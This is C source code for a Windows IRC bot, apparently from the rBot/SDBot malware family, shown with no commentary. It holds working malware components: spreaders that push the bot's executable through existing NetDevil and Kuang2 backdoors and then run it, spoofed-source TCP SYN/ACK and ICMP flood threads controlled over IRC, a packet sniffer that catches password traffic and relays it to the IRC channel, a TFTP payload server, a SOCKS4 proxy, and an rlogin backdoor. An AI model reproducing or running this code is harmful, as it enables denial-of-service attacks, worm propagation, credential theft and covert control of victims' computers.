DWORD WINAPI IdentThread(LPVOID param)
{
char user[12], buffer[IRCLINE];
int threadnum = (int)param;
BOOL success = FALSE;
SOCKET ssock,csock;
SOCKADDR_IN ssin, csin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)113);
ssin.sin_addr.s_addr=INADDR_ANY;
if ((ssock = fsocket(AF_INET, SOCK_STREAM, 0)) != INVALID_SOCKET) {
threads[threadnum].sock = ssock;
if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
if (flisten(ssock, 5) != SOCKET_ERROR) {
int csin_len = sizeof(csin);
while (1) {
if ((csock = faccept(ssock,(LPSOCKADDR)&csin,&csin_len)) == INVALID_SOCKET)
break;
sprintf(buffer, "[IDENTD]: Client connection from IP: %s:%d.", finet_ntoa(csin.sin_addr), csin.sin_port);
addlog(buffer);
if (frecv(csock,buffer,sizeof(buffer),0) != SOCKET_ERROR) {
Split(buffer,0);
memset(user, 0, sizeof(user));
_snprintf(buffer,sizeof(buffer)," : USERID : UNIX : %s\r\n",rndnick(user, LETTERNICK, FALSE));
if (fsend(csock,buffer,strlen(buffer),0) != SOCKET_ERROR)
success = TRUE;
}
}
}
}
}
if (!success) {
sprintf(buffer, "[IDENTD]: Error: server failed, returned: <%d>.", fWSAGetLastError());
addlog(buffer);
}
fclosesocket(ssock);
fclosesocket(csock);
clearthread(threadnum);
ExitThread(0);
}
int NetDevil_Upload(char *IP, SOCKET ssock)
{
SOCKET nsock;
char buffer[1024], botfile[MAX_PATH], rFile[MAX_PATH];
int port = 0,bytes_sent = 0;
unsigned int Fsend = 1024, Fsize, move;
DWORD mode = 0;
BOOL ver15 = FALSE;
GetModuleFileName(NULL, botfile, sizeof(botfile));
fsend(ssock, "version", 7, 0);
memset(buffer,0,sizeof(buffer));
frecv(ssock, buffer, sizeof(buffer), 0);
if (strlen(buffer) > 5) {
buffer[strlen(buffer)-2] = '\0';
char *uPort = strrchr(buffer, '\n\r');
if (uPort != NULL)
port = atoi(uPort);
}
char *ver = strtok(buffer,"\n\r");
if (strcmp(buffer,"ver1.5") == 0)
ver15 = TRUE;
sprintf(rFile,"C:\\%s",filename);
port = ((port == 0)?(903):(port));
if ((nsock = CreateSock(IP,port)) == INVALID_SOCKET)
goto end;
HANDLE testfile;
if ((testfile = CreateFile(botfile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0)) == INVALID_HANDLE_VALUE)
goto end;
Fsize = GetFileSize(testfile,NULL);
if (ver15)
sprintf(buffer,"cmd[003]%s|%i|\n\r",rFile,Fsize);
else
sprintf(buffer,"%s\r1",rFile);
fsend(nsock, buffer, strlen(buffer), 0);
if (frecv(nsock, buffer, sizeof(buffer), 0) < 1)
goto end;
while (Fsize) {
memset(buffer,0,sizeof(buffer));
if (Fsend>Fsize)
Fsend=Fsize;
move = 0-Fsize;
SetFilePointer(testfile, move, NULL, FILE_END);
ReadFile(testfile, buffer, Fsend, &mode, NULL);
bytes_sent = fsend(nsock, buffer, Fsend, 0);
if (bytes_sent == SOCKET_ERROR) {
if (fWSAGetLastError() != WSAEWOULDBLOCK)
goto end;
else
bytes_sent = 0;
}
Fsize = Fsize - bytes_sent;
if (!ver15 && frecv(nsock, buffer, sizeof(buffer), 0) < 1)
goto end;
}
if (testfile != INVALID_HANDLE_VALUE)
CloseHandle(testfile);
fclosesocket(nsock);
Sleep(2000);
sprintf(buffer,"pleaz_run%s",rFile);
fsend(ssock, buffer,strlen(buffer), 0);
memset(buffer,0,sizeof(buffer));
if (frecv(nsock, buffer, sizeof(buffer), 0) < 1)
goto end;
if (strcmp(buffer,"pleaz_run_done") != 0)
goto end;
Sleep(4000);
fclosesocket(ssock);
return 1;
end:;
fclosesocket(nsock);
fclosesocket(ssock);
return 0;
}
DWORD WINAPI TcpFloodThread(LPVOID param)
{
TCPFLOOD tcpflood = *((TCPFLOOD *)param);
TCPFLOOD *tcpfloods = (TCPFLOOD *)param;
tcpfloods->gotinfo = TRUE;
char sendbuf[IRCLINE], szSendBuf[60]={0};
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
srand(GetTickCount());
SOCKET ssock;
if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) {
sprintf(sendbuf,"[TCP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
BOOL flag = TRUE;
if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) {
sprintf(sendbuf,"[TCP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError());
if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
if (finet_addr(tcpflood.ip) == INADDR_NONE) {
sprintf(sendbuf,"[TCP]: Invalid target IP.");
if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family=AF_INET;
ssin.sin_port=fhtons(0);
ssin.sin_addr.s_addr=finet_addr(tcpflood.ip);
int sent = 0;
unsigned long start = GetTickCount();
while (((GetTickCount() - start) / 1000) <= (unsigned long)tcpflood.time) {
ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.sourceIP=((tcpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(tcpflood.sock))));
ipHeader.destIP=ssin.sin_addr.s_addr;
((tcpflood.port == 0)?(tcpHeader.dport=fhtons((unsigned short)(rand()%1025))):(tcpHeader.dport=fhtons(tcpflood.port)));
tcpHeader.sport=fhtons((unsigned short)(rand()%1025));
tcpHeader.seq=fhtonl(0x12345678);
if (strstr(tcpflood.type,"syn")) {
tcpHeader.ack_seq=0;
tcpHeader.flags=SYN;
} else if (strstr(tcpflood.type,"ack")) {
tcpHeader.ack_seq=0;
tcpHeader.flags=ACK;
} else if (strstr(tcpflood.type,"random")) {
tcpHeader.ack_seq=rand()%3;
((rand()%2 == 0)?(tcpHeader.flags=SYN):(tcpHeader.flags=ACK));
}
tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.window=fhtons(512);
tcpHeader.urg_ptr=0;
tcpHeader.checksum=0;
psdHeader.saddr=ipHeader.sourceIP;
psdHeader.daddr=ipHeader.destIP;
psdHeader.zero=0;
psdHeader.proto=IPPROTO_TCP;
psdHeader.length=fhtons((unsigned short)(sizeof(tcpHeader)));
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);
ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
if (fsendto(ssock, (char *)&szSendBuf, sizeof(szSendBuf), 0, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) {
fclosesocket(ssock);
_snprintf(sendbuf,sizeof(sendbuf),"[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", tcpflood.ip, sent, fWSAGetLastError());
if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
sent++;
}
fclosesocket(ssock);
sprintf(sendbuf,"[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", tcpflood.type, tcpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / tcpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024));
if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
BOOL SynPortOpen(unsigned long src_ip, unsigned long dest_ip, unsigned int port, unsigned int delay)
{
char buffer[LOGLINE];
int size;
unsigned short src_port = 9801;
TCPHEADER2 send_tcp;
send_tcp.source = fhtons(src_port);
send_tcp.dest = fhtons((unsigned short)port);
send_tcp.seq = rand();
send_tcp.ack_seq = 0;
send_tcp.res1 = 0;
send_tcp.res2 = 0;
send_tcp.doff = 5;
send_tcp.fin = 0;
send_tcp.syn = 1;
send_tcp.rst = 0;
send_tcp.psh = 0;
send_tcp.ack = 0;
send_tcp.urg = 0;
send_tcp.window = fhtons(512);
send_tcp.check = 0;
send_tcp.urg_ptr = 0;
PSDHEADER psdheader;
psdheader.saddr = src_ip;
psdheader.daddr = dest_ip;
psdheader.zero = 0;
psdheader.proto = IPPROTO_TCP;
psdheader.length = fhtons(sizeof(send_tcp));
memcpy (&psdheader.tcp, &send_tcp, sizeof (send_tcp));
send_tcp.check = checksum((unsigned short *)&psdheader, sizeof (psdheader));
SOCKADDR_IN ssin;
memset(&ssin,0,sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)port);
ssin.sin_addr.s_addr = dest_ip;
int ssin_len = sizeof(ssin);
SOCKET tcp_sock = fsocket(AF_INET, SOCK_RAW, IPPROTO_TCP);
if (tcp_sock == INVALID_SOCKET) {
addlog("socket open failed");
return FALSE;
}
if ((size = fsendto(tcp_sock,(const char *)&send_tcp,sizeof(send_tcp),0,(LPSOCKADDR)&ssin,ssin_len)) != 20) {
sprintf(buffer,"sendto() socket failed. sent = %d <%d>.", size, fWSAGetLastError());
addlog(buffer);
fclosesocket(tcp_sock);
return FALSE;
}
RECVHEADER recv_tcp;
memset (&recv_tcp,'\0',sizeof(recv_tcp));
while (recv_tcp.tcp.dest != src_port) {
if (frecvfrom(tcp_sock,(char *)&recv_tcp,sizeof(recv_tcp),0,(LPSOCKADDR)&ssin, &ssin_len) < 0) {
addlog("recvfrom() socket failed");
fclosesocket(tcp_sock);
return FALSE;
}
}
fclosesocket(tcp_sock);
if (recv_tcp.tcp.syn == 1) {
addlog("Socket open.");
return TRUE;
} else {
addlog("Socket closed.");
return FALSE;
}
}
DWORD WINAPI SniffThread(LPVOID param) {
char sendbuf[IRCLINE], rawdata[65535], *Packet;
int i;
DWORD dwRet, dwMode = 1;
PSNIFF sniff = *((PSNIFF *)param);
PSNIFF *sniffs = (PSNIFF *)param;
sniffs->gotinfo = TRUE;
IPHEADER *ip;
TCPHEADER *tcp;
IN_ADDR sia, dia;
SOCKET sniffsock;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons(0);
ssin.sin_addr.s_addr = finet_addr(GetIP(sniff.sock));
if ((sniffsock = fsocket(AF_INET, SOCK_RAW, IPPROTO_IP)) == INVALID_SOCKET) {
sprintf(sendbuf, "[PSNIFF]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
clearthread(sniff.threadnum);
ExitThread(0);
}
threads[sniff.threadnum].sock = sniffsock;
if (fbind(sniffsock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) {
sprintf(sendbuf, "[PSNIFF]: Error: bind() failed, returned: <%d>.", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
fclosesocket(sniffsock);
clearthread(sniff.threadnum);
ExitThread(0);
}
if (fWSAIoctl(sniffsock, SIO_RCVALL, &dwMode, sizeof(dwMode), NULL, 0, &dwRet, NULL, NULL) == SOCKET_ERROR) {
sprintf(sendbuf, "[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
fclosesocket(sniffsock);
clearthread(sniff.threadnum);
ExitThread(0);
}
while(1) {
memset(rawdata, 0, sizeof(rawdata));
Packet = (char *)rawdata;
if (frecv(sniffsock, Packet, sizeof(rawdata), 0) == SOCKET_ERROR) {
_snprintf(sendbuf,sizeof(sendbuf),"[PSNIFF]: Error: recv() failed, returned: <%d>", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
break;
}
ip = (IPHEADER *)Packet;
if (ip->proto == 6) {
Packet += sizeof(*ip);
tcp = (TCPHEADER *)Packet;
sia.S_un.S_addr = ip->sourceIP;
dia.S_un.S_addr = ip->destIP;
if (tcp->flags == 24) {
Packet += sizeof(*tcp);
if (strstr(Packet, "[PSNIFF]") == NULL) {
for (i=0;i < sizeof(pswords) / sizeof(PSWORDS);i++) {
if (strstr(Packet, pswords[i].text)) {
_snprintf(sendbuf, sizeof(sendbuf), "[PSNIFF]: Suspicious %s packet from: %s:%d to: %s:%d - %s",
ptype[pswords[i].type], finet_ntoa(sia), fntohs(tcp->sport), finet_ntoa(dia), fntohs(tcp->dport), Packet);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice, TRUE);
printf("%s\n",sendbuf);
addlog(sendbuf);
break;
}
}
}
}
}
}
fclosesocket(sniffsock);
clearthread(sniff.threadnum);
ExitThread(0);
}
DWORD WINAPI ICMPFloodThread(LPVOID param)
{
ICMPFLOOD icmpflood = *((ICMPFLOOD *)param);
ICMPFLOOD *icmpfloods = (ICMPFLOOD *)param;
icmpfloods->gotinfo = TRUE;
char sendbuf[IRCLINE], szSendBuf[60]={0};
static ECHOREQUEST echo_req;
SOCKET ssock;
if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) {
sprintf(sendbuf,"[ICMP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice);
clearthread(icmpflood.threadnum);
ExitThread(0);
}
BOOL flag = TRUE;
if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) {
sprintf(sendbuf,"[ICMP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError());
if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice);
clearthread(icmpflood.threadnum);
ExitThread(0);
}
if (finet_addr(icmpflood.ip) == INADDR_NONE) {
sprintf(sendbuf,"[ICMP]: Invalid target IP.");
if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice);
clearthread(icmpflood.threadnum);
ExitThread(0);
}
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family=AF_INET;
ssin.sin_port=fhtons(0);
ssin.sin_addr.s_addr=finet_addr(icmpflood.ip);
int sent = 0;
unsigned long start = GetTickCount();
while (((GetTickCount() - start) / 1000) <= (unsigned long)icmpflood.time) {
echo_req.ipHeader.verlen=(4<<4 | sizeof(IPHEADER)/sizeof(unsigned long));
echo_req.ipHeader.total_len=fhtons(sizeof(ECHOREQUEST));
echo_req.ipHeader.ident=1;
echo_req.ipHeader.frag_and_flags=0;
echo_req.ipHeader.ttl=128;
echo_req.ipHeader.proto=IPPROTO_ICMP;
echo_req.ipHeader.checksum=0;
echo_req.ipHeader.sourceIP=((icmpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(icmpflood.sock))));
echo_req.ipHeader.destIP=ssin.sin_addr.s_addr;
echo_req.icmpHeader.type = rand()%256;
echo_req.icmpHeader.subcode = rand()%256;
echo_req.icmpHeader.id = (rand() % 240) + 1;
echo_req.icmpHeader.checksum = 0;
echo_req.icmpHeader.seq = 1;
//fill the packet data with a random character..
memset(echo_req.cData, rand()%255, sizeof(echo_req.cData));
if (fsendto(ssock, (const char *) &echo_req, sizeof(ECHOREQUEST), 0, (LPSOCKADDR)&ssin, sizeof(SOCKADDR_IN)) == SOCKET_ERROR) {
fclosesocket(ssock);
_snprintf(sendbuf,sizeof(sendbuf),"[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", icmpflood.ip, sent, fWSAGetLastError());
if (!icmpflood.silent) irc_privmsg(icmpflood.sock, icmpflood.chan, sendbuf, icmpflood.notice);
clearthread(icmpflood.threadnum);
ExitThread(0);
}
sent++;
}
fclosesocket(ssock);
sprintf(sendbuf,"[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", icmpflood.type, icmpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / icmpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024));
if (!icmpflood.silent) irc_privmsg(icmpflood.sock, icmpflood.chan, sendbuf, icmpflood.notice);
clearthread(icmpflood.threadnum);
ExitThread(0);
}
DWORD WINAPI tftpserver(LPVOID param)
{
FILE *fp;
char sendbuf[IRCLINE], buffer[128], type[]="octet", IP[18];
int err=1;
TFTP tftp = *((TFTP *)param);
TFTP *tftps = (TFTP *)param;
tftps->gotinfo = TRUE;
tftp.threads++;
SOCKET ssock;
if ((ssock=fsocket(AF_INET,SOCK_DGRAM,0)) == INVALID_SOCKET) {
Sleep(400);
sprintf(sendbuf,"[TFTP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
addlog(sendbuf);
clearthread(tftp.threadnum);
ExitThread(0);
}
threads[tftp.threadnum].sock=ssock;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)tftp.port);
ssin.sin_addr.s_addr = INADDR_ANY;
if((fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin))) == SOCKET_ERROR) {
Sleep(5000);
tftp.threads--;
return tftpserver(param);
}
if ((fp=fopen(tftp.filename, "rb")) == NULL) {
Sleep(400);
sprintf(sendbuf,"[TFTP]: Failed to open file: %s.",tftp.filename);
irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
addlog(sendbuf);
clearthread(tftp.threadnum);
ExitThread(0);
}
while(err>0 && tftps->gotinfo && fp) {
TIMEVAL timeout;
timeout.tv_sec=5;
timeout.tv_usec=5000;
fd_set fd;
FD_ZERO(&fd);
FD_SET(ssock,&fd);
memset(buffer,0,sizeof(buffer));
if(fselect(0,&fd,NULL,NULL,&timeout) > 0) {
SOCKADDR_IN csin;
int csin_len=sizeof(csin);
char f_buffer[BLOCKSIZE+4]="";
err=frecvfrom(ssock, buffer, sizeof(buffer), 0, (LPSOCKADDR)&csin, &csin_len);
sprintf(IP,finet_ntoa(csin.sin_addr));
// parse buffer
if(buffer[0]==0 && buffer[1]==1) { //RRQ
char *tmprequest=buffer,*tmptype=buffer;
tmprequest+=2; //skip the opcode
tmptype+=(strlen(tftp.requestname)+3); //skip the opcode and request name + NULL
if(strncmp(tftp.requestname,tmprequest,strlen(tftp.requestname)) != 0||strncmp(type,tmptype,strlen(type)) != 0) {
fsendto(ssock, "\x00\x05\x00\x01\x46\x69\x6C\x65\x20\x4E\x6F\x74\x20\x46\x6F\x75\x6E\x64\x00", 19, 0, (LPSOCKADDR)&csin,csin_len);
// for loop to add a \0 to the end of the requestname
sprintf(buffer,"[TFTP]: File not found: %s (%s).",IP,tftp.requestname);
addlog(buffer);
} else { // good rrq packet send first data packet
fseek(fp, 0, SEEK_SET);
f_buffer[0]=0; f_buffer[1]=3; // DATA
f_buffer[2]=0; f_buffer[3]=1; // DATA BLOCK #
err=fread(&f_buffer[4], 1, BLOCKSIZE, fp);
fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len);
sprintf(sendbuf,"[TFTP]: File transfer started to IP: %s (%s).",IP,tftp.filename);
if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
addlog(sendbuf);
}
} else if(buffer[0]==0 && buffer[1]==4) { // ACK
// send next packet
unsigned int blocks;
BYTE b1=buffer[2],b2=buffer[3]; // ACK BLOCK #
f_buffer[0]=0; f_buffer[1]=3; // DATA
if (b2==255) { // DATA BLOCK #
f_buffer[2]=++b1;
f_buffer[3]=b2=0;
} else {
f_buffer[2]=b1;
f_buffer[3]=++b2;
}
blocks=(b1 * 256) + b2 - 1;
// remember to subtract 1 as the ACK block # is 1 more than the actual file block #
fseek(fp, blocks * BLOCKSIZE, SEEK_SET);
err=fread(&f_buffer[4], 1, BLOCKSIZE, fp);
fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len);
if (err==0) {
sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s (%s).",IP,tftp.filename);
if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
addlog(sendbuf);
}
} else { // we dont support any other commands
fsendto(ssock, "\x00\x05\x00\x04\x6B\x74\x68\x78\x00",9, 0, (LPSOCKADDR)&csin, csin_len);
}
} else
continue;
}
// check for ack, then msg irc on transfer complete
fclosesocket(ssock);
fclose(fp);
tftp.threads--;
if(tftps->gotinfo == FALSE) {
clearthread(tftp.threadnum);
ExitThread(0);
}
Sleep(1000);
return tftpserver(param);
}
DWORD WINAPI Socks4ClientThread(LPVOID param)
{
SOCKS4 socks4 = *((SOCKS4 *)param);
SOCKS4 *socks4p = (SOCKS4 *)param;
socks4p->cgotinfo = TRUE;
int threadnum = socks4.cthreadnum;
SOCKS4HEADER hdr;
TIMEVAL timeout;
timeout.tv_sec = 5;
timeout.tv_usec = 0;
fd_set fd;
FD_ZERO(&fd);
FD_SET(threads[threadnum].sock, &fd);
if (fselect(0, &fd, NULL, NULL, &timeout) == 0) {
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
if (frecv(threads[threadnum].sock, (char *)&hdr, sizeof(hdr), 0) <= 0) {
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
if (hdr.vn != 4 || hdr.cd != SOCKS4_CONNECT) {
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
// FIX ME: do a userid (hdr.userid) check here if you wish to use simple auth (needs testing)
if (socks4.userid[0] != '\0') {
if (strcmp(hdr.userid, socks4.userid) != 0) {
addlogv("[SOCKS4]: Authentication failed. Remote userid: %s != %s.", hdr.userid, socks4.userid);
hdr.vn = 0;
hdr.cd = SOCKS4_REJECT_USERID;
memset(&hdr.userid, 0, 1024);
fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
}
SOCKADDR_IN tsin;
memset(&tsin, 0, sizeof(tsin));
tsin.sin_family = AF_INET;
tsin.sin_port = hdr.destport;
tsin.sin_addr.s_addr = hdr.destaddr;
SOCKET tsock;
if ((tsock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) {
addlogv("[SOCKS4]: Error: Failed to open socket(), returned: <%d>.", fWSAGetLastError());
hdr.vn = 0;
hdr.cd = SOCKS4_REJECT;
memset(&hdr.userid, 0, 1024);
fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
if (fconnect(tsock, (LPSOCKADDR)&tsin, sizeof(tsin)) == SOCKET_ERROR) {
addlogv("[SOCKS4]: Error: Failed to connect to target, returned: <%d>.", fWSAGetLastError());
hdr.vn = 0;
hdr.cd = SOCKS4_REJECT;
memset(&hdr.userid, 0, 1024);
fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
hdr.vn = 0;
hdr.cd = SOCKS4_GRANT;
memset(&hdr.userid, 0, 1024);
fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);
TransferLoop(tsock, threads[threadnum].sock);
fclosesocket(tsock);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
int KUANG(SOCKET sock)
{
HANDLE testfile;
char rBuffer[1024], thisfilename[MAX_PATH], randFile[5], rFile[15];
unsigned int Fsize, move;
int x;
DWORD mode = 0;
memset(rFile,0,sizeof(rFile));
memset(randFile,0,sizeof(randFile));
srand(GetTickCount());
for (x=0;x < 4;x++)
randFile[x] = (char)((rand()%26)+97);
randFile[x+1] = '\0';
sprintf(rFile,"c:\\%s.exe",randFile);
fioctlsocket(sock,FIONBIO,&mode); //set the socket back to blocking
if (KUANG_Reciev(sock) == -1)
goto end;
memset(k2_buffer,0,sizeof(k2_buffer));
GetModuleFileName(NULL,thisfilename,sizeof(thisfilename));
testfile = CreateFile(thisfilename,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
if (testfile == INVALID_HANDLE_VALUE)
goto end;
Fsize = GetFileSize(testfile,NULL);
k2_msg->command=K2_UPLOAD_FILE;
k2_msg->param=Fsize;
strcpy(k2_msg->sdata,rFile);
//strcpy(k2_msg->bdata,rFile);
//CloseHandle(testfile);
fsend(sock,k2_buffer,1024, 0);
if (KUANG_Reciev(sock) == -1)
goto end;
while (Fsize) {
unsigned int Fsend = 1024;
memset(rBuffer,0,sizeof(rBuffer));
if (Fsend>Fsize)
Fsend=Fsize;
move = 0-Fsize;
SetFilePointer(testfile, move, NULL, FILE_END);
ReadFile(testfile, rBuffer, Fsend, &mode, NULL);
int bytes_sent = fsend(sock, rBuffer, Fsend, 0);
if (bytes_sent == SOCKET_ERROR) {
if (fWSAGetLastError() != WSAEWOULDBLOCK)
break;
else
bytes_sent = 0;
}
Fsize = Fsize - bytes_sent;
}
if (KUANG_Reciev(sock) == -1)
goto end;
if (testfile != INVALID_HANDLE_VALUE)
CloseHandle(testfile);
memset(k2_buffer,0,sizeof(k2_buffer));
k2_msg->command=K2_RUN_FILE;
sprintf(k2_msg->bdata,rFile);
fsend(sock,k2_buffer ,1024, 0);
if (KUANG_Reciev(sock) == -1)
goto end;
memset(k2_buffer,0,sizeof(k2_buffer));
k2_msg->command=K2_QUIT;
fsend(sock,k2_buffer ,4, 0);
return 1;
end:;
fclosesocket(sock);
return 0;
}
DWORD WINAPI RlogindClientThread(LPVOID param)
{
RLOGIND rlogind = *((RLOGIND *)param);
RLOGIND *rloginds = (RLOGIND *)param;
rloginds->gotinfo = TRUE;
int threadnum=rlogind.cthreadnum;
char LocalUser[16], RemoteUser[16], TerminalType[64], HostName[100], Buffer[16];
LPHOSTENT HostEnt;
SOCKADDR_IN csin;
TIMEVAL timeout;
timeout.tv_sec = 10;
timeout.tv_usec = 0;
fd_set fd;
FD_ZERO(&fd);
FD_SET(threads[threadnum].sock, &fd);
if (fselect(0, &fd, NULL, NULL, &timeout) == 0) {
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
frecv(threads[threadnum].sock, (char *)&Buffer, 1, 0);
GetStr(threads[threadnum].sock, RemoteUser, sizeof(RemoteUser));
GetStr(threads[threadnum].sock, LocalUser, sizeof(LocalUser));
GetStr(threads[threadnum].sock, TerminalType, sizeof(TerminalType));
int csin_len = sizeof(csin);
if (fgetpeername(threads[threadnum].sock, (LPSOCKADDR)&csin, &csin_len) != 0) {
addlogv("[RLOGIND]: Error: getpeername(): <%d>.", fWSAGetLastError());
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
if ((HostEnt = fgethostbyaddr((char *)&csin.sin_addr, sizeof(csin.sin_addr), PF_INET)) == NULL)
sprintf(HostName, finet_ntoa(csin.sin_addr));
else
strcpy(HostName, HostEnt->h_name);
frecv(threads[threadnum].sock, (char *)Buffer, sizeof(Buffer), 0);
fsend(threads[threadnum].sock, "", 1, 0);
if (!InsecureFlag && !CheckLogin(RemoteUser,HostName,rlogind.username,csin.sin_addr.s_addr)) {
fsend(threads[threadnum].sock, "PERMISSION DENIED.", sizeof("PERMISSION DENIED."), 0);
fshutdown(threads[threadnum].sock,SD_BOTH);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
addlogv("[RLOGIND]: User logged in: <%s@%s>.", RemoteUser, HostName);
if (!SessionRun(threadnum)) {
addlogv("[RLOGIND]: Error: SessionRun(): <%d>.", GetLastError());
fshutdown(threads[threadnum].sock,SD_BOTH);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(1);
}
addlogv("[RLOGIND]: User logged out: <%s@%s>.", RemoteUser, HostName);
fshutdown(threads[threadnum].sock,SD_BOTH);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
